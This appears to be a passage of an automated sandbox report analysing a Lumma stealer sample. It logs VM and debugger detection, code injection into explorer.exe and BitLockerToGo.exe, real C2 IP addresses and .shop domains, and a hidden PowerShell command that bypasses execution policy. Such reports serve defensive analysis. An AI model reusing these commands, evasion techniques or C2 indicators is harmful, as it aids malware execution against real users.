                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                  Queries memory information (via WMI often done to detect virtual machines)
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
                  Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformation
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
                  Source: C:\Users\user\AppData\Roaming\sbttifbAPI/Special instruction interceptor: Address: 7FFE2220E814
                  Source: C:\Users\user\AppData\Roaming\sbttifbAPI/Special instruction interceptor: Address: 7FFE2220D584
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeMemory allocated: 12B42640000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeMemory allocated: 12B5BFE0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeMemory allocated: 12B5F9C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeMemory allocated: 295804D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeMemory allocated: 29599EA0000 memory reserve | memory write watch
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmnet.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmmouse.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
                  Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 436Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3078Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 750Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1398Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeWindow / User API: threadDelayed 1041Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeWindow / User API: threadDelayed 691Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7688
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1817
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dllJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeJump to dropped file
                  Source: C:\Windows\explorer.exe TID: 7596Thread sleep time: -307800s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7592Thread sleep time: -75000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7944Thread sleep time: -33400s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7240Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 7596Thread sleep time: -139800s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exe TID: 2196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exe TID: 2196Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5676Thread sleep time: -210000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep time: -24903104499507879s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC347000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF6CC3471AFh6_2_00007FF6CC347000
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: explorer.exe, 00000001.00000000.1754864621.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000001.00000000.1754331572.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
                  Source: explorer.exe, 00000001.00000000.1754864621.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: explorer.exe, 00000001.00000000.1751218615.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000001.00000000.1754864621.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                  Source: explorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                  Source: explorer.exe, 00000001.00000000.1754331572.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                  Source: 60FC.exe.1.drBinary or memory string: runtime: sp=abi mismatchout of rangeCypro_MinoanMeetei_MayekPahawh_HmongSora_SompengSyloti_Nagrimultipathtcp127.0.0.1:53no such hostCIDR addressunknown portinvalid portgetaddrinfowtransmitfileGetConsoleCPnot pollableECDSA-SHA256ECDSA-SHA384ECDSA-SHA512SERIALNUMBERstringlengthContent-Typecontext.TODOtlsunsafeekmclose notifyremote errorc hs traffics hs trafficc ap traffics ap traffichttpmuxgo121PUSH_PROMISECONTINUATIONCookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continueMulti-StatusNot ModifiedUnauthorizedI'm a teapotNot ExtendedproxyconnectMime-VersionX-ImforwardsX-Powered-Bybad Tc valuebad Th valuebad Tq valuebad Pq valuebad Td valuebad Ta valuedisplay-nameban-durationRemoveSignerGetDealLabelChangePeerIDTransferFromgotypesaliasRCodeSuccessRCodeRefusedinvalid baseInstAltMatchunexpected )altmatch -> anynotnl -> empty numberReadObjectCBdecode arraydecode sliceunknown type = struct { Content Type (sensitive)simple errordbl-sha2-256base32hexpadbase58flickrbase64urlpadbase256emojiavx5124fmapsavx512bitalgcaller errorPskModePlaineccsi_sha256PUNSUBSCRIBESUNSUBSCRIBE(database)s$Switch Proxy.fasthttp.gz.fasthttp.brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunctionCalluncompressedparsing time out of rangeDeleteServiceRegEnumKeyExWRegOpenKeyExWStartServiceWCertOpenStoreFindNextFileWFindResourceWGetDriveTypeWMapViewOfFileModule32NextWThread32FirstVirtualUnlockWaitCommEventWriteConsoleWRtlGetVersionRtlInitStringCoTaskMemFreeEnumProcessesShellExecuteWExitWindowsExGetClassNameWtimeEndPeriodFreeAddrInfoWgethostbynamegetservbynameWTSFreeMemoryFindFirstFileWSACloseEventgethostbyaddrgetservbyportWSAResetEventWSAIsBlockingSysFreeStringSafeArrayLockSafeArrayCopyVarI2FromDateVarI2FromDispVarI2FromBoolVarI4FromDateVarI4FromDispVarI4FromBoolVarR4FromDateVarR4FromDispVarR4FromBoolVarR8FromDateVarR8FromDispVarR8FromBoolVarDateFromI2VarDateFromI4VarDateFromR4VarDateFromR8VarDateFromCyVarCyFromDateVarCyFromDispVarCyFromBoolVarBstrFromI2VarBstrFromI4VarBstrFromR4VarBstrFromR8VarBstrFromCyVarBoolFromI2VarBoolFromI4VarBoolFromR4VarBoolFromR8VarBoolFromCyVarUI1FromStrCreateTypeLibClearCustDataLoadTypeLibExVarDecFromUI1VarDecFromStrVarDateFromI1VarBstrFromI1VarBoolFromI1VarUI1FromUI2VarUI1FromUI4VarUI1FromDecVarDecFromUI2VarDecFromUI4VarI1FromDateVarI1FromDispVarI1FromBoolVarUI2FromUI1VarUI2FromStrVarUI2FromUI4VarUI2FromDecVarUI4FromUI1VarUI4FromStrVarUI4FromUI2VarUI4FromDecBSTR_UserSizeBSTR_UserFreeVarI8FromDateVarI8FromDispVarI8FromBoolVarDateFromI8VarBstrFromI8VarBoolFromI8VarUI1FromUI8VarDecFromUI8VarUI2FromUI8VarUI4FromUI8VarUI8FromUI1VarUI8FromStrVarUI8FromUI2VarUI8FromUI4VarUI8FromDecOMAP From SrcInterfaceImplStandAloneSigAssemblyRefOSEFI byte codeMIPS with FPUEFI ROM imageAlign 2-BytesAlign 4-BytesAlign 8-Bytesby_start_timeDRAINING_SUBSDRAINING_PU
                  Source: explorer.exe, 00000001.00000000.1754331572.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1754331572.000000000982D000.00000004.00000001.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2599449395.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2679045634.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748536287.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2751394615.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2751320655.00000000027CB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2697815214.0000000002808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: explorer.exe, 00000001.00000000.1754864621.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                  Source: 60FC.exeBinary or memory string: .brAMDisbetter!AuthenticAMDCentaurHaulsGenuineIntelTransmetaCPUGenuineTMx86Geode by NSCVIA VIA VIA KVMKVMKVMKVMMicrosoft HvVMwareVMwareXenVMMXenVMMbhyve bhyve HygonGenuineVortex86 SoCSiS SiS SiS RiseRiseRiseGenuine RDCECH requiredbad KDF ID: BindCompleteFunct
                  Source: explorer.exe, 00000001.00000000.1752824604.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                  Source: explorer.exe, 00000001.00000000.1751218615.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: explorer.exe, 00000001.00000000.1754331572.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                  Source: 60FC.exe, 00000008.00000002.2596112844.00000298B5908000.00000004.00000020.00020000.00000000.sdmp, 6BC6.exe, 0000000A.00000002.4176188821.0000012B5F87C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: explorer.exe, 00000001.00000000.1751218615.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSystem information queried: CodeIntegrityInformationJump to behavior
                  Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB3329 CheckRemoteDebuggerPresent,10_2_00007FFD9BAB3329
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess queried: DebugPort
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 13_2_00219D10 LdrInitializeThunk,13_2_00219D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_026E092B mov eax, dword ptr fs:[00000030h]0_2_026E092B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_026E0D90 mov eax, dword ptr fs:[00000030h]0_2_026E0D90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02733DBF push dword ptr fs:[00000030h]0_2_02733DBF
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_0250092B mov eax, dword ptr fs:[00000030h]5_2_0250092B
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_02500D90 mov eax, dword ptr fs:[00000030h]5_2_02500D90
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F4B7F push dword ptr fs:[00000030h]5_2_026F4B7F
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Benign windows process drops PE files
                  Source: C:\Windows\explorer.exeFile created: 6267.exe.1.drJump to dropped file
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 162.0.235.84 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.18.245.58 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.199.183.102 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory allocated: C:\Windows\explorer.exe base: 3070000 protect: page read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory allocated: C:\Windows\explorer.exe base: 8D90000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory allocated: C:\Windows\explorer.exe base: 8F30000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory allocated: C:\Windows\explorer.exe base: 9070000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 1E0000 protect: page execute and read and writeJump to behavior
                  Bypasses PowerShell execution policy
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Changes memory attributes in foreign processes to executable or writable
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory protected: C:\Windows\explorer.exe base: 3070000 protect: page execute and read and writeJump to behavior
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 34519D0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbThread created: unknown EIP: 8EF19D0Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 1E0000 value starts with: 4D5AJump to behavior
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory written: PID: 2580 base: 3070000 value: 20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory written: PID: 2580 base: 3071000 value: 48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory written: PID: 2580 base: 9070030 value: 00Jump to behavior
                  LummaC encrypted strings found
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: indexterityszcoxp.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: lariatedzugspd.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: callosallsaospz.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: outpointsozp.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: liernessfornicsa.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: upknittsoappz.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shepherdlyopzc.shop
                  Source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: unseaffarignsk.shop
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\sbttifbSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory written: C:\Windows\explorer.exe base: 3070000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory written: C:\Windows\explorer.exe base: 3071000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeMemory written: C:\Windows\explorer.exe base: 9070030Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 1E0000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 246C008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Users\user\AppData\Local\Temp\6BC6.exe "C:\Users\user\AppData\Local\Temp\6BC6.exe" -HOSTRUNAS Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6267.exeCode function: 6_2_00007FF6CC3AF310 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,CheckTokenMembership,6_2_00007FF6CC3AF310
                  Source: explorer.exe, 00000001.00000000.1752665205.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1754331572.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1751443020.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000001.00000000.1751443020.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000001.00000000.1751218615.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                  Source: explorer.exe, 00000001.00000000.1751443020.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000001.00000000.1751443020.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\60FC.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6BC6.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
